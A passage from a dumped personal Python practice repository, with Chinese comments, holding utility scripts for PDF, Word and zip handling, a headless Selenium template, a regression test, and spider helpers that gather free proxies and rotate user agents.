open(str(os.path.dirname(pdf_path)) + os.path.sep + "output.pdf", "wb") 40 | output.write(output_stream) 41 | output_stream.close() 42 | 43 | def merge_pdf(self, file_dir, outfile): 44 | """ 45 | 合并同一目录下的所有PDF文件 46 | :param filepath: 存放PDF的原文件夹 47 | :param outfile: 输出的PDF文件的名称 48 | :return: 49 | """ 50 | output = PdfFileWriter() 51 | output_pages = 0 52 | pdf_file_name = comDocOperate.getSameEndsFileInDir(file_dir, ".pdf") 53 | 54 | if pdf_file_name: 55 | for pdf_file in pdf_file_name: 56 | # 读取源PDF文件 57 | input = PdfFileReader(open(pdf_file, "rb")) 58 | # 获得源PDF文件中页面总数 59 | page_count = input.getNumPages() 60 | output_pages += page_count 61 | print("{pdfFile}文件页数:{page_count}". 62 | format(pdfFile=pdf_file, page_count=page_count)) 63 | 64 | # 分别将page添加到输出output中 65 | for one_page in range(page_count): 66 | output.addPage(input.getPage(one_page)) 67 | print("合并后的总页数:{pages}".format(pages=output_pages)) 68 | 69 | # 写入到目标PDF文件 70 | output_stream = open(os.path.join(file_dir, outfile), "wb") 71 | output.write(output_stream) 72 | output_stream.close() 73 | print("PDF文件合并完成!") 74 | else: 75 | print("没有可以合并的PDF文件!") 76 | 77 | 78 | if __name__ == '__main__': 79 | # 开始页 80 | start_page = 0 81 | # 截止页 82 | end_page = 5 83 | # 84 | pdf_path = r"D:\ZX\temp\test\1\0.pdf" 85 | 86 | pdf_operate = PdfOperate() 87 | # pdfOper.get_limit_page_pdf(pdf_path, start_page, end_page) 88 | 89 | file_dir = r'D:\ZX\temp\test\1' # 存放PDF的原文件夹 90 | outfile = "out.pdf" # 输出的PDF文件的名称 91 | pdf_operate.merge_pdf(file_dir, outfile) 92 | -------------------------------------------------------------------------------- /practice/technique/selenium_template.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/7/20 15:03 8 | @File : selenium_template.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | from selenium import webdriver 16 | from comConfig.user_agent import UserAgent 17 | from comConfig.random_ip import RandomIp 18 | 19 | 20 | class SeleniumTemp: 21 | def __init__(self): 22 | self.chrome_options = webdriver.ChromeOptions() 23 | self.chrome_options.add_argument('--headless') 24 | self.chrome_options.add_argument('--disable-gpu') 25 | # 指定 chromedriver.exe 文件路径 26 | self.executable_path = "D:\ZX_workspace\Python\otherfiles\chromedriver\chromedriver.exe" 27 | 28 | def selenium_operate(self): 29 | """ 30 | 加载 chrome driver,每次加载时更新 IP 与 useragent 31 | :return: driver 32 | """ 33 | # 有代理 IP 时加载 34 | # self.chrome_options.add_argument('--proxy-server=http://{}'.format(RandomIp().get_one_ip())) 35 | self.chrome_options.add_argument('--user-agent=' + UserAgent().get_user_agent()) 36 | return webdriver.Chrome(chrome_options=self.chrome_options, executable_path=self.executable_path) 37 | 38 | def get_page_source(self, driver, url): 39 | """ 40 | 获取页面全部内容 41 | :param driver: 42 | :param url: 43 | :return: 44 | """ 45 | driver.get(url) 46 | return driver.page_source 47 | 48 | if __name__ == '__main__': 49 | url = "http://exam.sac.net.cn/pages/registration/sac-finish-person.html?r2SS_IFjjk=8E0DEB6C9FC3F295E053D651A8C05FCD" 50 | selenium_temp = SeleniumTemp() 51 | driver = selenium_temp.selenium_operate() 52 | data = selenium_temp.get_page_source(driver, url) 53 | print(data) 54 | -------------------------------------------------------------------------------- /practice/technique/test_data/test.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/8/4 17:04 8 | @File : test.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | # -*- coding:utf-8 -*- 16 | 17 | import pandas as pd 18 | import numpy as np 19 | import seaborn as sns 20 | import matplotlib.pyplot as plt 21 | from pandas import DataFrame, Series 22 | # from sklearn.cross_validation import train_test_split 23 | from sklearn.linear_model import LinearRegression 24 | 25 | # 读取文件 26 | datafile = 'test_excel.xlsx' # 文件所在位置,u为防止路径中有中文名称,此处没有,可以省略 27 | data = pd.read_excel(datafile) # datafile是excel文件,所以用read_excel,如果是csv文件则用read_csv 28 | examDf = DataFrame(data) 29 | 30 | # 数据清洗,比如第一列有可能是日期,这样的话我们就只需要从第二列开始的数据, 31 | # 这个情况下,把下面中括号中的0改为1就好,要哪些列取哪些列 32 | new_examDf = examDf.ix[:, 1:] 33 | 34 | # 检验数据 35 | print(new_examDf.describe()) # 数据描述,会显示最值,平均数等信息,可以简单判断数据中是否有异常值 36 | print(new_examDf[new_examDf.isnull() == True].count()) # 检验缺失值,若输出为0,说明该列没有缺失值 37 | 38 | # 输出相关系数,判断是否值得做线性回归模型 39 | print(new_examDf.corr()) # 0-0.3弱相关;0.3-0.6中相关;0.6-1强相关; 40 | 41 | # 通过seaborn添加一条最佳拟合直线和95%的置信带,直观判断相关关系 42 | # sns.pairplot(data, x_vars=['visitor_id'], y_vars='created_time', height=7, aspect=0.8, kind='reg') 43 | -------------------------------------------------------------------------------- /practice/technique/test_data/test_excel.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yaojin-li/Python/080d720fc6248af04b4b20f9988c115f6aff8e81/practice/technique/test_data/test_excel.xlsx -------------------------------------------------------------------------------- /practice/technique/word_operate.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : word相关的文件操作 6 | 参考链接: 7 | https://www.cnblogs.com/ontheway703/p/5266041.html 8 | https://blog.csdn.net/xtfge0915/article/details/83479922 9 | -------------------------------- 10 | @Time : 2019/5/25 10:39 11 | @File : word_operate.py 12 | @Software: PyCharm 13 | -------------------------------- 14 | @Author : lixj 15 | @contact : lixj_zj@163.com 16 | """ 17 | 18 | from docx import * 19 | import re 20 | from docx.shared import Pt 21 | from docx.shared import Inches 22 | from win32com import client 23 | from docx.enum.style import WD_STYLE_TYPE 24 | import os, zipfile, shutil 25 | 26 | 27 | class WordOperate(): 28 | def __init__(self): 29 | pass 30 | 31 | def show_style(self): 32 | """ 33 | 查看word常用样式,在读取或写入时设置 34 | :return: 35 | """ 36 | doc = Document() 37 | styles = doc.styles 38 | 39 | # 查看段落样式 40 | for s in styles: 41 | if s.type == WD_STYLE_TYPE.PARAGRAPH: 42 | print("段落样式:", s.name) 43 | 44 | # 查看字符样式 45 | for s in styles: 46 | if s.type == WD_STYLE_TYPE.CHARACTER: 47 | print("字符样式:", s.name) 48 | 49 | # 查看表格样式 50 | for s in styles: 51 | if s.type == WD_STYLE_TYPE.TABLE: 52 | print("表格样式:", s.name) 53 | 54 | def set_style(self): 55 | """ 56 | word中设置样式 57 | :return: 58 | """ 59 | document = Document() 60 | 61 | # 1.段落设置样式 62 | paragraph = document.add_paragraph() 63 | paragraph.style = document.styles['Heading 1'] # style选取 64 | paragraph.style = 'Heading 1' # 用样式名称直接赋值 65 | paragraph2 = document.add_paragraph(style='Body Text') # 创建段落时赋值 66 | 67 | # 2.设置段落中的字符格式,定义样式中的字符格式后,所有运用此样式的段落都有相应的字符格式 68 | # 从样式库中选取 'Normal' 样式,并提取 'Normal' 样式的字符属性 69 | style = document.styles['Normal'] 70 | font = style.font 71 | # 设置样式中的字符属性 ,操作方法和上面改变内联对象属性方法一致 72 | font.name = "Microsoft YaHei UI" 73 | font.size = Pt(50) # 字体大小 74 | # 将设置好字符属性的样式运用到段落中 75 | p = document.add_paragraph("change font attribution", style='Normal') 76 | 77 | # 3.设置段落格式,定义样式中的段落格式后,所有运用此样式的段落都有相应的段落格式 78 | styles = document.styles 79 | # 选取 style,并设置 style 中的段落格式 80 | style = styles['Heading 2'] 81 | para_format = style.paragraph_format 82 | para_format.left_indent = Pt(20) 83 | para_format.widow_control = True 84 | # 将设置好段落格式的 style 运用到段落中 85 | p = document.add_paragraph('This is Heading, level 1', style=style) 86 | 87 | def get_head(self, doc_path): 88 | """ 89 | 读取 word 标题 90 | :param doc_path: 文档路径 91 | :return: 92 | """ 93 | doc = Document(doc_path) 94 | for p in doc.paragraphs: 95 | # 遍历1、2、3级标题 96 | if p.style.name == 'Heading 1': 97 | print(p.text) 98 | if p.style.name == 'Heading 2': 99 | print(p.text) 100 | if p.style.name == 'Heading 3': 101 | print(p.text) 102 | 103 | # 遍历所有标题 104 | for p in doc.paragraphs: 105 | if re.match("^Heading \d+$", p.style.name): 106 | print(p.text) 107 | 108 | def get_content(self, doc_path): 109 | """ 110 | 读取 word 内容 111 | :param doc_path: 文档路径 112 | :return: 113 | """ 114 | doc = Document(doc_path) 115 | # 读取正文 116 | for p in doc.paragraphs: 117 | if p.style.name == 'Normal': 118 | print(p.text) 119 | 120 | def write_content(self, result_doc_path): 121 | """ 122 | doc写入文件 123 | :param result_doc_path: 写入 word 文档路径 124 | :return: 125 | """ 126 | doc = Document() 127 | # 写入标题 128 | doc.add_heading("heading 1", level=1) 129 | doc.add_paragraph("heading 1", style='Heading 1') 130 | 131 | # 写入正文 132 | doc.add_paragraph("正文") 133 | 134 | # 写入分页符 135 | doc.add_page_break() 136 | 137 | # 写入表格 138 | table = doc.add_table(rows=1, cols=3, style="Light List Accent 5") 139 | hdr_cells = table.rows[0].cells 140 | hdr_cells[0].text = 'testName' 141 | hdr_cells[1].text = 'param' 142 | hdr_cells[2].text = 'exc' 143 | 144 | # 写入图片 145 | doc.add_picture("imgName", width=Inches(1.5)) # 设置宽度 146 | 147 | doc.save(result_doc_path) 148 | 149 | def get_img_from_doc(self, doc_path): 150 | """ 151 | 从word中提取图片到对应目录img文件夹 152 | word转zip-提取midea中的word-复制到新目录并重命名同名为文件夹-zip还原成word,删除word文件夹 153 | :param docdir: word 路径 154 | :return: 155 | """ 156 | # 切换路径 157 | doc_abs_path = os.path.abspath(os.path.dirname(doc_path) + os.path.sep + ".") 158 | os.chdir(doc_abs_path) 159 | 160 | # 遍历文件 161 | for file in os.listdir(doc_abs_path): 162 | if file.endswith("docx"): # 匹配docx文件 163 | doc_name = file.split(".") # 以“.”做成列表形式 164 | os.rename(file, "{docName}.ZIP".format(docName=doc_name[0])) # 重命名为ZIP格式 165 | f = zipfile.ZipFile("{docName}.ZIP".format(docName=doc_name[0]), 'r') 166 | for file in f.namelist(): 167 | if "word" in file: 168 | f.extract(file) # 将压缩包里的word文件夹解压 169 | f.close() 170 | old_img_dir = r"{absPath}\word\media".format(absPath=doc_abs_path) # 定义图片文件夹 171 | shutil.copytree(old_img_dir, "{absPath}\{docName}".format(absPath=doc_abs_path, 172 | docName=doc_name[0])) # 拷贝到新目录,名称为word文件的名字 173 | os.rename("{docName}.ZIP".format(docName=doc_name[0]), 174 | "{docName}.docx".format(docName=doc_name[0])) # 将ZIP名字还原为DOCX 175 | shutil.rmtree("{absPath}\word".format(absPath=doc_abs_path)) # 删除word文件夹 176 | else: 177 | print(file, "非docx文件!") 178 | 179 | def word_to_pdf(self, doc_path): 180 | """ 181 | word 转换成 pdf 182 | :param doc_path: docx 文件路径 183 | :return: 184 | """ 185 | # 切换路径 186 | doc_abs_path = os.path.abspath(os.path.dirname(doc_path) + os.path.sep + ".") 187 | os.chdir(doc_abs_path) 188 | dir_list = os.listdir(doc_abs_path) 189 | for file in dir_list: 190 | if file.endswith("docx"): # 匹配docx文件 191 | word = client.DispatchEx("Word.Application") 192 | base_name = os.path.basename(file).split('.')[0] 193 | word_file = word.Documents.Open(os.path.abspath(file), ReadOnly=1) 194 | word_file.SaveAs(doc_abs_path + os.path.sep + str(base_name) + ".pdf", FileFormat=17) 195 | word_file.Close() 196 | else: 197 | print(file, "非docx文件!") 198 | 199 | 200 | if __name__ == '__main__': 201 | root_doc_path = r'D:\ZX\temp\test\1\test.docx' 202 | result_doc_path = r"C:\Users\Tebon\Desktop\test\result.docx" 203 | word_oper = WordOperate() 204 | word_oper.get_content(root_doc_path) 205 | word_oper.write_content(result_doc_path) 206 | word_oper.show_style() 207 | word_oper.get_img_from_doc(root_doc_path) 208 | word_oper.word_to_pdf(root_doc_path) 209 | -------------------------------------------------------------------------------- /practice/technique/zip_file_operate.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : zip 文件常用操作 6 | -------------------------------- 7 | @Time : 2019/8/13 15:24 8 | @File : test_zip.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import zipfile 16 | import os 17 | 18 | def unzip_file(zip_file_name, unzip_path): 19 | """ 20 | 解压 zip 文件。(注:解压文件路径下包含同名称待解压文件,会覆盖!) 21 | :param zip_file_name: 解压文件的名称,含路径全地址 22 | :param dic_path: 解压文件路径 23 | """ 24 | if zipfile.is_zipfile(zip_file_name): 25 | archive = zipfile.ZipFile(zip_file_name, mode='r') 26 | for file in archive.namelist(): 27 | archive.extract(file, unzip_path) 28 | else: 29 | print("{} is not zip file.".format(zip_file_name)) 30 | 31 | 32 | def get_zip_file_name(dic_path): 33 | """ 34 | 将指定的 zip 文件内容解压到指定路径中 35 | :param dic_path: 指定路径 36 | :return: 压缩文件全路径 37 | """ 38 | zip_file_path = [] 39 | for root, dirs, files in os.walk(dic_path): 40 | for file in files: 41 | if os.path.splitext(file)[1] == '.zip': # 读取zip文件 42 | zip_file_path.append(os.path.join(root, file)) 43 | return zip_file_path 44 | 45 | 46 | if __name__ == '__main__': 47 | zip_file_path = "E:\\zip" # zip file 路径 48 | upzip_file_path = "E:\\zip\\res" # 解压路径 49 | 50 | fn = get_zip_file_name(zip_file_path) 51 | for file in fn: 52 | unzip_file(file, upzip_file_path) 53 | 54 | -------------------------------------------------------------------------------- /project_directory_structure.txt: -------------------------------------------------------------------------------- 1 | projectName/ 2 | |-- bin/ 或script/之类,存放项目的一些可执行文件,但bin/更直观。 3 | | |-- __init__ 4 | |  |-- start.py 启动主程序,入口文件 5 | | 6 | |-- core/ 存放项目的所有源代码(核心代码)。 7 | | (1) 源代码中的所有模块、包都应该放在此目录。不要置于顶层目录。 8 | | (2) 程序的入口最好命名为main.py。 9 | | |-- tests/ 子目录tests/存放单元测试代码; 10 | | | |-- __init__.py 11 | | | |-- test.main.py 12 | | | 13 | | |-- __init__.py 14 | | |-- test_main.py| 存放核心逻辑 15 | | 16 | |-- config/ 配置文件 17 | | |-- __init__.py 18 | | |-- setting.py 写上相关配置 19 | | 20 | |---db/ 数据库文件 21 | | |--db.json 写数据库文件 22 | | 23 | |-- docs/ 相关文档说明 24 | | 25 | |-- examples/ 案例或者临时文件存放目录 26 | | 27 | |-- wiki/ wiki 28 | | 29 | |-- lib/ 库文件,放自定义模块和包 30 | | |-- __init__.py 31 | | |-- common.py 放常用的功能 32 | | 33 | |-- log/ 日志文件 34 | | |-- access.log 日志 35 | | 36 | |-- __init__.py 37 | |-- README 项目说明文件(内容说明,作者清单,版权声明,编译脚本) 38 | 39 | 注:运行程序时,在bin目录下执行start.py代码,不可以直接执行core下的模块。 40 | 41 | 关于README的内容,它需要说明以下几个事项: 42 | 软件定位,软件的基本功能。 43 | 运行代码的方法: 安装环境、启动命令等。 44 | 简要的使用说明。 45 | 代码目录结构说明,更详细点可以说明软件的基本原理。 46 | 常见问题说明。 47 | -------------------------------------------------------------------------------- /spider/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/6 22:45 8 | @File : __init__.py.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /spider/config/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/30 9:05 8 | @File : __init__.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /spider/config/ipPool.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yaojin-li/Python/080d720fc6248af04b4b20f9988c115f6aff8e81/spider/config/ipPool.txt -------------------------------------------------------------------------------- /spider/config/random_ip.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 获取随机可以用IP 6 | -------------------------------- 7 | @Time : 19-2-28 上午11:28 8 | @File : random_ip.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import requests 16 | from bs4 import BeautifulSoup as bs 17 | import user_agent 18 | import logging 19 | import os 20 | import random 21 | import traceback 22 | import time 23 | 24 | # logging.basicConfig函数对日志的输出格式及方式做相关配置 25 | logging.basicConfig(level=logging.DEBUG, 26 | format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s') 27 | 28 | 29 | class RandomIp(): 30 | def __init__(self): 31 | self.XICI_URL = "https://www.xicidaili.com/nn/" 32 | self.TEST_URL = "https://www.jd.com/" 33 | self.IP_POOL_FILE = "ip_pool.txt" 34 | self.MAX_PAGE_OF_XICI = 3614 # 西刺网站总页数 35 | self.NUM_OF_PAGES = 2 # 爬取的目标页数 36 | # 获取随机的headers 37 | self.headers = user_agent.UserAgent().get_headers() # userAgent.UserAgent() 类实例化()括号就相当于self参数 38 | 39 | def get_target_pages(self, page): 40 | """ 41 | 获取随机的NUM_OF_PAGES页 42 | :param page: 43 | :return: 44 | """ 45 | return random.sample(range(1, page), self.NUM_OF_PAGES) 46 | 47 | def request_get(self, url): 48 | """ 49 | requests请求 50 | :param url: 51 | :return: 52 | """ 53 | return requests.get(url, headers=self.headers, timeout=10) 54 | 55 | def analysis_page(self, req): 56 | result_ip_pool = [] 57 | soup = bs(req.text, "lxml") 58 | ips = soup.find_all("tr") 59 | # 遍历当页的每条记录 60 | for i in range(1, len(ips)): 61 | try: 62 | ip = ips[i] 63 | tds = ip.find_all("td") 64 | temp_ip = str(tds[5].contents[0]).lower() + '://' + tds[1].contents[0] + ':' + tds[2].contents[0] 65 | speed = float(tds[6].div.get("title")[:-1]) 66 | connect_time = float(tds[7].div.get("title")[:-1]) 67 | # 68 | if speed < 0.5 and connect_time < 0.5: 69 | result_ip_pool.append(temp_ip) 70 | except Exception as e: 71 | logging.error("解析IP参数异常!") 72 | traceback.format_exc(e) 73 | return result_ip_pool 74 | 75 | def get_ip_pool(self): 76 | """ 77 | 获取IP池 78 | :return: 79 | """ 80 | result_ip_pool = [] 81 | max_page = self.MAX_PAGE_OF_XICI 82 | # 获取随机的NUM_OF_PAGES页 83 | target_pages = RandomIp().get_target_pages(max_page) 84 | for one_page in target_pages: 85 | one_page_url = self.XICI_URL + str(one_page) 86 | req = RandomIp().request_get(one_page_url) 87 | if (req.status_code == 200): 88 | result_ip_pool.extend(RandomIp().analysis_page(req)) 89 | else: 90 | logging.error("连接异常!异常url:", one_page_url) 91 | return result_ip_pool 92 | 93 | def review_ip_pool(self): 94 | """ 95 | 重新验证IP池 96 | :return: ip_pool 97 | """ 98 | ip_pool_path = self.IP_POOL_FILE 99 | try: 100 | with open(ip_pool_path, "r", encoding="utf-8") as f: 101 | content = f.read() 102 | ip_pool = content[2:len(content) - 2].split("', '") 103 | reduce_num = 0 104 | logging.info("IP池中待验证个数:{}".format(len(ip_pool))) 105 | for ip in ip_pool[:]: 106 | proxy = {ip.split("://")[0]: ip.split("://")[1]} 107 | try: 108 | req = requests.get(self.TEST_URL, proxies=proxy, headers=self.headers, timeout=3) 109 | if req.status_code != 200: 110 | ip_pool.remove(ip) 111 | reduce_num += 1 112 | time.sleep(1) 113 | except Exception as e: 114 | logging.error("ip异常:{},异常信息:{}".format(ip, str(e))) 115 | ip_pool.remove(ip) 116 | reduce_num += 1 117 | continue 118 | logging.info("IP池中已验证个数:{},减少个数:{}个".format(len(ip_pool), reduce_num)) 119 | with open(ip_pool_path, "w", encoding="utf-8") as f: 120 | f.write(str(ip_pool)) 121 | logging.info("IP池已更新!") 122 | except Exception as e: 123 | logging.error("重新验证IP池异常!异常信息:{}".format(e)) 124 | 125 | def write_ip_to_file(self): 126 | """ 127 | IP写入文件,追加形式 128 | :return: 129 | """ 130 | try: 131 | module_path = os.path.dirname(__file__) 132 | file_name = module_path + '\\' + self.IP_POOL_FILE 133 | with open(file_name, "a+", encoding="utf-8") as f: 134 | f.write(str(self.get_ip_pool())) 135 | logging.info("写入IP {} 个结束!".format(len(self.get_ip_pool()))) 136 | except Exception as e: 137 | logging.error("IP写入文件异常!异常信息:", e) 138 | traceback.format_exc(e) 139 | 140 | def get_one_ip(self): 141 | """ 142 | 获取随机的一个IP地址 143 | :return: 144 | """ 145 | try: 146 | module_path = os.path.dirname(__file__) 147 | file_name = module_path + '\\' + self.IP_POOL_FILE 148 | with open(file_name, "r", encoding="utf-8") as f: 149 | content = f.read() 150 | ip_list = content[1:len(content) - 1].split(", ") 151 | random_ip = random.choice(ip_list) # choice()获取一个 152 | logging.info("random_ip: %s", random_ip) 153 | return random_ip 154 | except Exception as e: 155 | logging.error("IP读入文件异常!异常信息:", e) 156 | traceback.format_exc(e) 157 | 158 | def get_one_proxies(self): 159 | """ 160 | 获取随机的一个Proxies 161 | :return: 162 | """ 163 | try: 164 | module_path = os.path.dirname(__file__) 165 | file_name = module_path + '\\' + self.IP_POOL_FILE 166 | with open(file_name, "r", encoding="utf-8") as f: 167 | content = f.read() 168 | ip_list = content[2:len(content) - 2].split("', '") 169 | random_ip = random.choice(ip_list) # choice()获取一个 170 | proxies = {"http": random_ip} 171 | logging.info("proxies: %s", str(proxies)) 172 | return proxies 173 | except Exception as e: 174 | logging.error("IP读入文件异常!异常信息:", e) 175 | traceback.format_exc(e) 176 | 177 | def get_num_of_ip(self, num_of_ip): 178 | """ 179 | 获取指定数量的IP 180 | :return: 181 | """ 182 | try: 183 | module_path = os.path.dirname(__file__) 184 | file_name = module_path + '\\' + self.IP_POOL_FILE 185 | with open(file_name, "r", encoding="utf-8") as f: 186 | content = f.read() 187 | cont_list = content.split("', '") 188 | ip_list = cont_list[1:len(cont_list) - 1] 189 | random_ip_list = random.sample(ip_list, num_of_ip) # sample()获取多个 190 | logging.info("random_ip_list: %s", random_ip_list) 191 | return random_ip_list 192 | except Exception as e: 193 | logging.error("IP读入文件异常!异常信息:", e) 194 | traceback.format_exc(e) 195 | 196 | 197 | if __name__ == '__main__': 198 | RandomIp().write_ip_to_file() 199 | RandomIp().review_ip_pool() 200 | 201 | 202 | -------------------------------------------------------------------------------- /spider/config/test_comfig.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/6 17:49 8 | @File : test_comfig.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import random_ip 16 | import user_agent 17 | 18 | # 文件中写入IP 19 | random_ip.RandomIp().write_ip_to_file() 20 | 21 | # 重新验证IP 22 | random_ip.RandomIp().review_ip_pool() 23 | 24 | # 获取随机一个IP 25 | random_ip.RandomIp().get_one_ip() 26 | 27 | # 获取随机一个prop 28 | random_ip.RandomIp().get_one_proxies() 29 | 30 | # 获取随机的多个IP 31 | random_ip.RandomIp().get_num_of_ip(5) 32 | 33 | # 获取随机userAgent 34 | user_agent.UserAgent().get_user_agent() 35 | 36 | # 获取随机headers 37 | user_agent.UserAgent().get_headers() 38 | -------------------------------------------------------------------------------- /spider/configure/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 6 | -------------------------------------- 7 | @File : __init__.py.py 8 | @Time : 2019/1/2 23:00 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | __all__ = ["userAgent"] 17 | -------------------------------------------------------------------------------- /spider/configure/log.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 6 | -------------------------------------- 7 | @File : log.py 8 | @Time : 2019/2/28 22:31 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | # -*- coding:utf-8 -*- 17 | import logging 18 | import logging.config 19 | import os 20 | 21 | path = os.path.abspath(__file__) 22 | BASE_DIR = os.path.dirname(os.path.dirname(path)) 23 | 24 | debug_flag = True 25 | 26 | # 给过滤器使用的判断 27 | class RequireDebugTrue(logging.Filter): 28 | # 实现filter方法 29 | def filter(self, record): 30 | return debug_flag 31 | 32 | logging_config = { 33 | #必选项,其值是一个整数值,表示配置格式的版本,当前唯一可用的值就是1 34 | 'version': 1, 35 | # 是否禁用现有的记录器 36 | 'disable_existing_loggers': False, 37 | 38 | # 过滤器 39 | 'filters': { 40 | 'require_debug_true': { 41 | '()': RequireDebugTrue, #在开发环境,我设置DEBUG为True;在客户端,我设置DEBUG为False。从而控制是否需要使用某些处理器。 42 | } 43 | }, 44 | 45 | #日志格式集合 46 | 'formatters': { 47 | 'simple': { 48 | 'format': '%(asctime)s - %(name)s - %(levelname)s - %(message)s', 49 | }, 50 | }, 51 | 52 | # 处理器集合 53 | 'handlers': { 54 | # 输出到控制台 55 | 'console': { 56 | 'level': 'DEBUG', # 输出信息的最低级别 57 | 'class': 'logging.StreamHandler', 58 | 'formatter': 'simple', # 使用standard格式 59 | 'filters': ['require_debug_true', ], # 仅当 DEBUG = True 该处理器才生效 60 | }, 61 | # 输出到文件 62 | 'log': { 63 | 'level': 'DEBUG', 64 | 'class': 'logging.handlers.RotatingFileHandler', 65 | 'formatter': 'simple', 66 | 'filename': os.path.join(BASE_DIR, 'debug.log'), # 输出位置 67 | 'maxBytes': 1024 * 1024 * 5, # 文件大小 5M 68 | 'backupCount': 5, # 备份份数 69 | 'encoding': 'utf8', # 文件编码 70 | }, 71 | }, 72 | 73 | # 日志管理器集合 74 | 'loggers':{ 75 | 'root': { 76 | 'handlers': ['console','log'], 77 | 'level': 'DEBUG', 78 | 'propagate': True, # 是否传递给父记录器 79 | }, 80 | 'simple': { 81 | 'handlers': ['console','log'], 82 | 'level': 'WARN', 83 | 'propagate': True, # 是否传递给父记录器, 84 | } 85 | } 86 | } 87 | -------------------------------------------------------------------------------- /spider/configure/randomIp.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 6 | -------------------------------------- 7 | @File : randomIp.py 8 | @Time : 2019/1/2 23:22 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | import requests 17 | from bs4 import BeautifulSoup as bs 18 | import configure.userAgent as userAgent 19 | import logging 20 | import random 21 | import traceback 22 | 23 | # logging.basicConfig函数对日志的输出格式及方式做相关配置 24 | logging.basicConfig(level=logging.DEBUG, 25 | format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s') 26 | 27 | 28 | class RandomIp(): 29 | def __init__(self): 30 | self.XICI_URL = "https://www.xicidaili.com/nn/" 31 | self.BAIDU_URL = "https://zhidao.baidu.com/question/362128631342231812.html" 32 | self.MAX_PAGE_OF_XICI = 3614 # 西刺网站总页数 33 | self.NUM_OF_PAGES = 10 # 爬取的目标页数 34 | # 获取随机的headers 35 | # self.headers = userAgent.UserAgent().getRandomHeaders() # userAgent.UserAgent() 类实例化()括号就相当于self参数 36 | 37 | def getIpPool(self): 38 | """ 39 | 获取IP池 40 | :return: 41 | """ 42 | resultIpPool = [] 43 | maxPage = self.MAX_PAGE_OF_XICI 44 | # 获取随机的NUM_OF_PAGES页 45 | targetPages = random.sample(range(1, maxPage), self.NUM_OF_PAGES) 46 | for onePage in targetPages: 47 | onePageUrl = self.XICI_URL + str(onePage) 48 | req = requests.get(onePageUrl, 49 | headers=userAgent.UserAgent().getRandomHeaders(), 50 | timeout=10) 51 | # 52 | if (req.status_code == 200): 53 | soup = bs(req.text, "lxml") 54 | ips = soup.find_all("tr") 55 | # 遍历当页的每条记录 56 | for i in range(1, len(ips)): 57 | try: 58 | ip = ips[i] 59 | tds = ip.find_all("td") 60 | tempIp = str(tds[5].contents[0]).lower() + "://" + tds[1].contents[0] + ":" + tds[2].contents[0] 61 | speed = float(tds[6].div.get("title")[:-1]) 62 | connectTime = float(tds[7].div.get("title")[:-1]) 63 | # 64 | if speed < 0.5 and connectTime < 0.5: 65 | resultIpPool.append(tempIp) 66 | except Exception as e: 67 | logging.error("解析IP参数异常!") 68 | traceback.format_exc(e) 69 | else: 70 | logging.error("连接异常!异常url:", onePageUrl) 71 | return resultIpPool 72 | 73 | def reviewIp(self): 74 | """ 75 | 重新验证IP池 76 | :return: ipPool 77 | """ 78 | ipPool = self.getIpPool() 79 | try: 80 | for ip in ipPool[:10]: 81 | proxy = {ip.split("://")[0]: ip.split("://")[1]} 82 | req = 